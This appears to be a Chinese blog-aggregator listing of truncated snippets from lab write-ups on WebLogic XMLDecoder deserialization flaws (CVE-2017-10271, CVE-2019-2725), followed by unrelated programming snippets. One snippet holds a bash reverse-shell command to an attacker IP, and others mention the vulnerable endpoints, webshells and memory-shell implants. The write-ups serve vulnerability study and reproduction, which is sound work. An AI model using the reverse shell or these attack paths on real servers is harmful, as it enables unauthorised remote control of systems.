- Weblogic反序列化远程命令执行(CVE-2019-2725)
慕筱蚺
网络安全python
漏洞描述:CVE-2019-2725是一个Oracleweblogic反序列化远程命令执行漏洞,这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞,通过针对Oracle官网历年来的补丁构造payload来绕过。复现过程:1.访问ip:port2.可以访问/_async/AsyncResponseService,则存在漏洞3.查看网站路径/_async/AsyncResponseS
- weblogic漏洞总结复现
1ance.
漏洞复现dockerweblogic漏洞复现
目录简介Weblogic未授权任意文件上传(CVE-2018-2894)漏洞描述漏洞原理影响范围复现过程修复建议参考WeblogicConsoleHTTP协议远程代码执行漏洞(CVE-2020-14882/CVE-2020-12883)漏洞描述漏洞原理影响范围复现过程修复建议XMLDecoder反序列化漏洞(CVE-2017-10271)漏洞描述漏洞原理影响范围复现过程修复建议Weblogic反序
- weblogic漏洞复现整理汇总(vulhub)
nzyp_
安全开发语言
weblogic漏洞复现整理汇总(vulhub)目录weblogic漏洞复现整理汇总(vulhub)一、概述二、任意文件上传漏洞(CVE-2018-2894)三、XMLDecoder反序列化漏洞(CVE-2017-10271)四、反序列化漏洞(CVE-2018-2628)五、未授权命令执行漏洞(CVE-2020-14882)根据vulhub已有的复现环境,对weblogic漏洞复现进行一个汇总,包
- 【漏洞复现】weblogic-10.3.6-‘wls-wsat‘-XMLDecoder反序列化(CVE-2017-10271)
过期的秋刀鱼-
#漏洞复现weblogic漏洞复现
感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规文章目录1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描nacsweblogicScanner3、漏洞验证说明内容漏洞编号CVE-2017-10271漏洞名称Weblogic/bin/bash-cbash-i>&/dev/tcp/192.168.80.141/210>&
- Weblogic XMLDecoder反序列化漏洞(CVE -2017-10271)复现
重楼学网安
web安全linux
漏洞原理本文介绍了WeblogicXMLDecoder反序列化相关的漏洞原理,并以CVE-2017-10271为例在vulhub上进行了复现。有关WeblogicXMLDecoder反序列化漏洞包括CVE-2017-3506、CVE-2017-10271、CVE-2019-2725、CVE-2019-2729等,其漏洞原理相似,这里首先简要介绍WeblogcXMLDecoder相关的背景知识。We
- Weblogic xmldecoder反序列化中的命令回显与内存马总结
卿's Blog(已清空)
首发先知社区:https://xz.aliyun.com/t/10323虽说weblogicxmldecoder的洞是几年前的,但是之前内外网场景下老是遇到,大多数情况是不出网、不方便写webshell(weblogic负载均衡,轮询)场景,需要解决的问题就是回显构造和内存马的植入。所以想花个时间来总结一下。而说到回显、内存马植入的文章网上越来越多,看了文章都知道有哪些方法,比如回显问题大多数都知
- Weblogic 10.3.6 ‘wls-wsat‘ XMLDecoder 反序列化漏洞(CVE-2017-10271)
维梓梓
中间件漏洞复现安全漏洞weblogic信息安全
声明好好学习,天天向上漏洞描述Weblogic的WLSSecurity组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。影响范围10.3.6.0.012.1.3.0.012.2.1.1.012.2.1.2.0复现过程这里使用10.3.6.0版本使用vulhubcd/app/vulhub-master/
- [Vulhub] Weblogic < 10.3.6 ‘wls-wsat‘ XMLDecoder 反序列化漏洞(CVE-2017-10271)
yAnd0n9
漏洞复现weblogic渗透测试java安全漏洞
0x00Java反序列化漏洞java序列化与反序列化Java的序列化(Serialize)与反序列化(Deserialize)是对IO流的一种机制。Java序列化的目标是将对象保存到磁盘中或允许在网络中直接传输对象。序列化机制将允许实现序列化的java对象转换成不依赖平台的字节序列,这些字节序列可以保存在磁盘上,或通过网络传输。而Java的反序列化可以把字节序列恢复为Java对象,也就是说序列化将
- CVE-2017-10271 WebLogic XMLDecoder反序列化漏洞
b1gpig安全
漏洞复现与分析安全漏洞
漏洞产生原因:CVE-2017-10271漏洞产生的原因大致是Weblogic的WLSSecurity组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。涉及版本:10.3.6.0.012.1.3.0.012.2.1.1.012.2.1.2
- Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271复现)
gaynell
漏洞复现weblogic反序列漏洞Web漏洞安全网络web安全java系统安全
文章目录前言影响版本环境搭建漏洞复现深度利用前言CVE-2017-10271漏洞产生的原因大致是Weblogic的WLSSecurity组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。漏洞触发url:/wls-wsat/Coordina
- Weblogic XMLDecoder(CVE-2017-10271)反序列化漏洞复现
Ranwu0
VulHub漏洞复现安全网络安全
漏洞描述CVE-2017-10271漏洞主要是由WebLogicServerWLS组件远程命令执行漏洞,主要由wls-wsat.war触发该漏洞,触发漏洞url如下:http://192.168.xx.xx:7001/wls-wsat/CoordinatorPortTypepost数据包,通过构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞漏洞影响版本Weblo
- Weblogic ‘wls-wsat‘ XMLDecoder 反序列化漏洞 CVE-2017-10271 漏洞复现
Senimo_
漏洞复现Weblogicwls-wsatXMLDecoder反序列化CVE-2017-10271漏洞复现
Weblogic'wls-wsat'XMLDecoder反序列化漏洞CVE-2017-10271漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接一、漏洞描述Weblogic的WLSSecurity组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。二、漏洞影
- Weblogic < 10.3.6 ‘wls-wsat‘ XMLDecoder 反序列化漏洞 CVE-2017-10271 漏洞复现
ADummy_
vulhub_Writeup安全漏洞网络安全渗透测试
Weblogic命令执行0x01漏洞介绍Weblogic的WLSSecurity组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令影响版本10.3.6.012.1.3.0.012.2.1.1.0漏洞地址/wls-wsat/CoordinatorPortType/wls-wsat/Registration
- java 反序列化漏洞 weblogic版本_WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)漏洞分析...
慢火车阅读
java反序列化漏洞weblogic版本
12月22号,绿盟科技博客发布一篇文章,里面有提及到weblogic由于存在0day漏洞,导致被植入恶意软件用来挖掘比特币。后来经过确认,这次***者所用的漏洞CVE编号为CVE-2017-10271,那么这个漏洞究竟是怎样造成的?0.分析环境IDE:IntellijIDEA中间件版本:weblogic10.3.6【未进行任何补丁修复】发包工具:brupsuite1.漏洞成因我们先来看一下,网上公
- java weblogic反序列化,WebLogic 反序列化漏洞(CVE-2017-10271)
weixin_39851809
javaweblogic反序列化
0x00WebLogicWLS组件反序列化漏洞这个漏洞的编号是CVE-2017-10271,漏洞存在于OracleWebLogic的wls-wsat组件中,该组件的XMLDecoder方法在反序列化时存在漏洞可远程代码执行,凡是版本号然后访问:http://127.0.0.1:7001/wls-wsat/cert.jsp即可0x03执行命令POST/wls-wsat/CoordinatorPort
- Weblogic反序列化漏洞(CVE-2017-10271)
不习惯有你
漏洞复现篇安全web安全
注意:仅用于技术讨论,切勿用于其他用途,一切后果与本人无关!!!基本理论WebLogicWLS组件中存在XMLDecoder远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击漏洞产生的原因是因为在调用,xml的时候没有做过滤,从而导致漏洞的产生漏洞复现1.找到存在漏洞的页面2.可以通过DNSLOG来验证漏洞是否存在,首先到网上找一段POC,注意标注中加颜色的部分POST/wl
- Weblogic < 10.3.6 ‘wls-wsat‘ XMLDecoder 反序列化漏洞(CVE-2017-10271)
qq_45449318
Weblogic漏洞复现xml安全
Weblogic<10.3.6“wls-wsat”XMLDecoder反序列化漏洞(CVE-2017-10271)复现环境:vulhub漏洞原因:Weblogic的WLSSecurity组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。详细原因:https://www.cnblogs.com/heti
- weblogic __ 10.3.6 __ 反序列化漏洞 _ CVE-2017-10271
cgjil
漏洞复现安全
weblogic__10.3.6__反序列化漏洞_CVE-2017-10271说明内容漏洞编号CVE-2017-10271漏洞名称反序列化漏洞影响范围10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0漏洞描述Weblogic的WLSSecurity组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反
- 春秋云镜 CVE-2019-2725
isbug0
靶场安全web安全
春秋云镜CVE-2019-2725Weblogic<10.3.6‘wls-wsat’XMLDecoder反序列化漏洞靶标介绍OracleFusionMiddleware(子组件:WebServices)的OracleWebLogicServer组件中的漏洞。受影响的受支持版本为10.3.6.0.0和12.1.3.0.0。易于利用的漏洞允许未经身份验证的攻击者通过HTTP进行网络访问,从而破坏Ora
- weblogic XML反序列化分析——CVE-2017-10271
菜鸡学安全
代码审计网络安全
环境https://vulhub.org/#/environments/weblogic/CVE-2017-10271/启动环境docker-composeup-d代码审计传入参数中间跟进函数最后的出口没有限制,直接包参数传入xmlDecoderpublicStringreadLine()throwsIOException{return(String)this.xmlDecoder.readObj
- CVE-2017-10271复现
吃啥呀
1.漏洞介绍1.1背景介绍Weblogic的WLSSecurity组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。2.漏洞详细复现步骤2.1环境&工具漏洞机:192.168.10.200ubuntudockervulhub攻击机:Windows10Burpsuitwireshark2.2漏洞复现步骤
- Weblogic CVE-2017-10271漏洞复现
Admin3K
原理:CVE-2017-10271漏洞主要是由WebLogicServerWLS组件远程命令执行漏洞,主要由wls-wsat.war触发该漏洞,触发漏洞url如下:http://101.32.30.69:7001/wls-wsat/CoordinatorPortTypepost数据包,通过构造构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞。环境:vulhub影
- weblogic XMLDecoder反序列化
f1ight
XMLDecoder和XMLEncoderjava中对对象的序列化和反序列化有多种实现方式,比如原生的使用ObjectOuptutStream/ObjectInputStream来实现序列化和反序列化,还有使用fastjson来进行对象的序列/反序列化,还有使用XStream等,这里的XMLEncoder/XMLDecoder也是java提供的一种序列化和反序列化的方式XMLEncoder/XML
- 第十三篇:JAVA对象持久化
咖啡Q伴侣
Java相关开发java
持久化就是将内存中的数据保存起来,使之可以长期存在。在Java中,我们可以把JAVA对象直接保存在文件中,在需要使用的时候,直接从文件中读取,这也是对象持久化的一种方式,在这一篇博客中,将演示两种将JAVA对象持久化到文件的方法,直接上代码:importjava.beans.XMLDecoder;importjava.beans.XMLEncoder;importjava.io.File;impo
- JAVA对象持久化
蒋固金
JAVAjava对象持久化
持久化就是将内存中的数据保存起来,使之可以长期存在。在JAVA中,我们可以把JAVA对象直接保存在文件中,在需要使用的时候,直接从文件中读取,这也是对象持久化的一种方式,在这一篇博客中,将演示两种将JAVA对象持久化到文件的方法,直接上代码:importjava.beans.XMLDecoder;importjava.beans.XMLEncoder;importjava.io.File;impo
- weblogic-XMLDecoder反序列化(CVE-2017-10271)
贫僧法号云空丶
漏洞复现网络安全web安全weblogic
weblogic-XMLDecoder反序列化(CVE-2017-10271)漏洞复现-CVE-2017-102710x00前言Weblogic的WLSSecurity组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。影响版本:10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2
- Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)检测及漏洞复现
低调求发展
漏洞环境:搭建参考:https://www.freebuf.com/column/204885.html10.3.6.0weblogic影响版本:10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0漏洞检测:检测存在漏洞检测工具下载地址:链接:https://pan.baidu.com/s/16d8aiHJs5wzlkz8pKq1m3g提取码:vnao漏洞利用:反
- Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)
天猫来下凡
weblogic漏洞复现web安全
WeblogicXMLDecoder反序列化漏洞(CVE-2017-10271)1.漏洞原理Weblogic的WLSSecurity组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。漏洞涉及版本10.3.6.0.012.1.3.0.012.2.1.1.012.2.1.2.02.环境搭建在vulhub中
- 网络安全漏洞复现与分析
kali_Ma
web安全网络安全信息安全渗透测试漏洞挖掘
漏洞介绍Weblogic的WLSSecurity组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。影响版本OracleWebLogicServer10.3.6.0.0OracleWebLogicServer12.1.3.0.0Oracle
- [CVE-2019-2725] Weblogc XMLDecoder RCE
caiqiiqi
Web安全java
主要看看回显方案,参考:https://github.com/iceMatcha/CNTA-2019-0014xCVE-2019-2725/blob/master/weblogic_rce.pyhttps://github.com/pimps/CVE-2019-2725/blob/master/weblogic_exploit.pyWeblogic远程命令执行漏洞分析(CVE-2019-2725)
- mysql主从数据同步
林鹤霄
mysql主从数据同步
配置mysql5.5主从服务器(转)
教程开始:一、安装MySQL
说明:在两台MySQL服务器192.168.21.169和192.168.21.168上分别进行如下操作,安装MySQL 5.5.22
二、配置MySQL主服务器(192.168.21.169)mysql -uroot -p &nb
- oracle学习笔记
caoyong
oracle
1、ORACLE的安装
a>、ORACLE的版本
8i,9i : i是internet
10g,11g : grid (网格)
12c : cloud (云计算)
b>、10g不支持win7
&
- 数据库,SQL零基础入门
天子之骄
sql数据库入门基本术语
数据库,SQL零基础入门
做网站肯定离不开数据库,本人之前没怎么具体接触SQL,这几天起早贪黑得各种入门,恶补脑洞。一些具体的知识点,可以让小白不再迷茫的术语,拿来与大家分享。
数据库,永久数据的一个或多个大型结构化集合,通常与更新和查询数据的软件相关
- pom.xml
一炮送你回车库
pom.xml
1、一级元素dependencies是可以被子项目继承的
2、一级元素dependencyManagement是定义该项目群里jar包版本号的,通常和一级元素properties一起使用,既然有继承,也肯定有一级元素modules来定义子元素
3、父项目里的一级元素<modules>
<module>lcas-admin-war</module>
<
- sql查地区省市县
3213213333332132
sqlmysql
-- db_yhm_city
SELECT * FROM db_yhm_city WHERE class_parent_id = 1 -- 海南 class_id = 9 港、奥、台 class_id = 33、34、35
SELECT * FROM db_yhm_city WHERE class_parent_id =169
SELECT d1.cla
- 关于监听器那些让人头疼的事
宝剑锋梅花香
画图板监听器鼠标监听器
本人初学JAVA,对于界面开发我只能说有点蛋疼,用JAVA来做界面的话确实需要一定的耐心(不使用插件,就算使用插件的话也没好多少)既然Java提供了界面开发,老师又要求做,只能硬着头皮上啦。但是监听器还真是个难懂的地方,我是上了几次课才略微搞懂了些。
- JAVA的遍历MAP
darkranger
map
Java Map遍历方式的选择
1. 阐述
对于Java中Map的遍历方式,很多文章都推荐使用entrySet,认为其比keySet的效率高很多。理由是:entrySet方法一次拿到所有key和value的集合;而keySet拿到的只是key的集合,针对每个key,都要去Map中额外查找一次value,从而降低了总体效率。那么实际情况如何呢?
为了解遍历性能的真实差距,包括在遍历ke
- POJ 2312 Battle City 优先多列+bfs
aijuans
搜索
来源:http://poj.org/problem?id=2312
题意:题目背景就是小时候玩的坦克大战,求从起点到终点最少需要多少步。已知S和R是不能走得,E是空的,可以走,B是砖,只有打掉后才可以通过。
思路:很容易看出来这是一道广搜的题目,但是因为走E和走B所需要的时间不一样,因此不能用普通的队列存点。因为对于走B来说,要先打掉砖才能通过,所以我们可以理解为走B需要两步,而走E是指需要1
- Hibernate与Jpa的关系,终于弄懂
avords
javaHibernate数据库jpa
我知道Jpa是一种规范,而Hibernate是它的一种实现。除了Hibernate,还有EclipseLink(曾经的toplink),OpenJPA等可供选择,所以使用Jpa的一个好处是,可以更换实现而不必改动太多代码。
在play中定义Model时,使用的是jpa的annotations,比如javax.persistence.Entity, Table, Column, OneToMany
- 酸爽的console.log
bee1314
console
在前端的开发中,console.log那是开发必备啊,简直直观。通过写小函数,组合大功能。更容易测试。但是在打版本时,就要删除console.log,打完版本进入开发状态又要添加,真不够爽。重复劳动太多。所以可以做些简单地封装,方便开发和上线。
/**
* log.js hufeng
* The safe wrapper for `console.xxx` functions
*
- 哈佛教授:穷人和过于忙碌的人有一个共同思维特质
bijian1013
时间管理励志人生穷人过于忙碌
一个跨学科团队今年完成了一项对资源稀缺状况下人的思维方式的研究,结论是:穷人和过于忙碌的人有一个共同思维特质,即注意力被稀缺资源过分占据,引起认知和判断力的全面下降。这项研究是心理学、行为经济学和政策研究学者协作的典范。
这个研究源于穆来纳森对自己拖延症的憎恨。他7岁从印度移民美国,很快就如鱼得水,哈佛毕业
- other operate
征客丶
OSosx
一、Mac Finder 设置排序方式,预览栏 在显示-》查看显示选项中
二、有时预览显示时,卡死在那,有可能是一些临时文件夹被删除了,如:/private/tmp[有待验证]
--------------------------------------------------------------------
若有其他凝问或文中有错误,请及时向我指出,
我好及时改正,同时也让我们一
- 【Scala五】分析Spark源代码总结的Scala语法三
bit1129
scala
1. If语句作为表达式
val properties = if (jobIdToActiveJob.contains(jobId)) {
jobIdToActiveJob(stage.jobId).properties
} else {
// this stage will be assigned to "default" po
- ZooKeeper 入门
BlueSkator
中间件zk
ZooKeeper是一个高可用的分布式数据管理与系统协调框架。基于对Paxos算法的实现,使该框架保证了分布式环境中数据的强一致性,也正是基于这样的特性,使得ZooKeeper解决很多分布式问题。网上对ZK的应用场景也有不少介绍,本文将结合作者身边的项目例子,系统地对ZK的应用场景进行一个分门归类的介绍。
值得注意的是,ZK并非天生就是为这些应用场景设计的,都是后来众多开发者根据其框架的特性,利
- MySQL取得当前时间的函数是什么 格式化日期的函数是什么
BreakingBad
mysqlDate
取得当前时间用 now() 就行。
在数据库中格式化时间 用DATE_FORMA T(date, format) .
根据格式串format 格式化日期或日期和时间值date,返回结果串。
可用DATE_FORMAT( ) 来格式化DATE 或DATETIME 值,以便得到所希望的格式。根据format字符串格式化date值:
%S, %s 两位数字形式的秒( 00,01,
- 读《研磨设计模式》-代码笔记-组合模式
bylijinnan
java设计模式
声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/
import java.util.ArrayList;
import java.util.List;
abstract class Component {
public abstract void printStruct(Str
- 4_JAVA+Oracle面试题(有答案)
chenke
oracle
基础测试题
卷面上不能出现任何的涂写文字,所有的答案要求写在答题纸上,考卷不得带走。
选择题
1、 What will happen when you attempt to compile and run the following code? (3)
public class Static {
static {
int x = 5; // 在static内有效
}
st
- 新一代工作流系统设计目标
comsci
工作算法脚本
用户只需要给工作流系统制定若干个需求,流程系统根据需求,并结合事先输入的组织机构和权限结构,调用若干算法,在流程展示版面上面显示出系统自动生成的流程图,然后由用户根据实际情况对该流程图进行微调,直到满意为止,流程在运行过程中,系统和用户可以根据情况对流程进行实时的调整,包括拓扑结构的调整,权限的调整,内置脚本的调整。。。。。
在这个设计中,最难的地方是系统根据什么来生成流
- oracle 行链接与行迁移
daizj
oracle行迁移
表里的一行对于一个数据块太大的情况有二种(一行在一个数据块里放不下)
第一种情况:
INSERT的时候,INSERT时候行的大小就超一个块的大小。Oracle把这行的数据存储在一连串的数据块里(Oracle Stores the data for the row in a chain of data blocks),这种情况称为行链接(Row Chain),一般不可避免(除非使用更大的数据
- [JShop]开源电子商务系统jshop的系统缓存实现
dinguangx
jshop电子商务
前言
jeeshop中通过SystemManager管理了大量的缓存数据,来提升系统的性能,但这些缓存数据全部都是存放于内存中的,无法满足特定场景的数据更新(如集群环境)。JShop对jeeshop的缓存机制进行了扩展,提供CacheProvider来辅助SystemManager管理这些缓存数据,通过CacheProvider,可以把缓存存放在内存,ehcache,redis,memcache
- 初三全学年难记忆单词
dcj3sjt126com
englishword
several 儿子;若干
shelf 架子
knowledge 知识;学问
librarian 图书管理员
abroad 到国外,在国外
surf 冲浪
wave 浪;波浪
twice 两次;两倍
describe 描写;叙述
especially 特别;尤其
attract 吸引
prize 奖品;奖赏
competition 比赛;竞争
event 大事;事件
O
- sphinx实践
dcj3sjt126com
sphinx
安装参考地址:http://briansnelson.com/How_to_install_Sphinx_on_Centos_Server
yum install sphinx
如果失败的话使用下面的方式安装
wget http://sphinxsearch.com/files/sphinx-2.2.9-1.rhel6.x86_64.rpm
yum loca
- JPA之JPQL(三)
frank1234
ormjpaJPQL
1 什么是JPQL
JPQL是Java Persistence Query Language的简称,可以看成是JPA中的HQL, JPQL支持各种复杂查询。
2 检索单个对象
@Test
public void querySingleObject1() {
Query query = em.createQuery("sele
- Remove Duplicates from Sorted Array II
hcx2013
remove
Follow up for "Remove Duplicates":What if duplicates are allowed at most twice?
For example,Given sorted array nums = [1,1,1,2,2,3],
Your function should return length
- Spring4新特性——Groovy Bean定义DSL
jinnianshilongnian
spring 4
Spring4新特性——泛型限定式依赖注入
Spring4新特性——核心容器的其他改进
Spring4新特性——Web开发的增强
Spring4新特性——集成Bean Validation 1.1(JSR-349)到SpringMVC
Spring4新特性——Groovy Bean定义DSL
Spring4新特性——更好的Java泛型操作API
Spring4新
- CentOS安装Mysql5.5
liuxingguome
centos
CentOS下以RPM方式安装MySQL5.5
首先卸载系统自带Mysql:
yum remove mysql mysql-server mysql-libs compat-mysql51
rm -rf /var/lib/mysql
rm /etc/my.cnf
查看是否还有mysql软件:
rpm -qa|grep mysql
去http://dev.mysql.c
- 第14章 工具函数(下)
onestopweb
函数
index.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
- POJ 1050
SaraWon
二维数组子矩阵最大和
POJ ACM第1050题的详细描述,请参照
http://acm.pku.edu.cn/JudgeOnline/problem?id=1050
题目意思:
给定包含有正负整型的二维数组,找出所有子矩阵的和的最大值。
如二维数组
0 -2 -7 0
9 2 -6 2
-4 1 -4 1
-1 8 0 -2
中和最大的子矩阵是
9 2
-4 1
-1 8
且最大和是15
- [5]设计模式——单例模式
tsface
java单例设计模式虚拟机
单例模式:保证一个类仅有一个实例,并提供一个访问它的全局访问点
安全的单例模式:
/*
* @(#)Singleton.java 2014-8-1
*
* Copyright 2014 XXXX, Inc. All rights reserved.
*/
package com.fiberhome.singleton;
- Java8全新打造,英语学习supertool
yangshangchuan
javasuperword闭包java8函数式编程
superword是一个Java实现的英文单词分析软件,主要研究英语单词音近形似转化规律、前缀后缀规律、词之间的相似性规律等等。Clean code、Fluent style、Java8 feature: Lambdas, Streams and Functional-style Programming。
升学考试、工作求职、充电提高,都少不了英语的身影,英语对我们来说实在太重要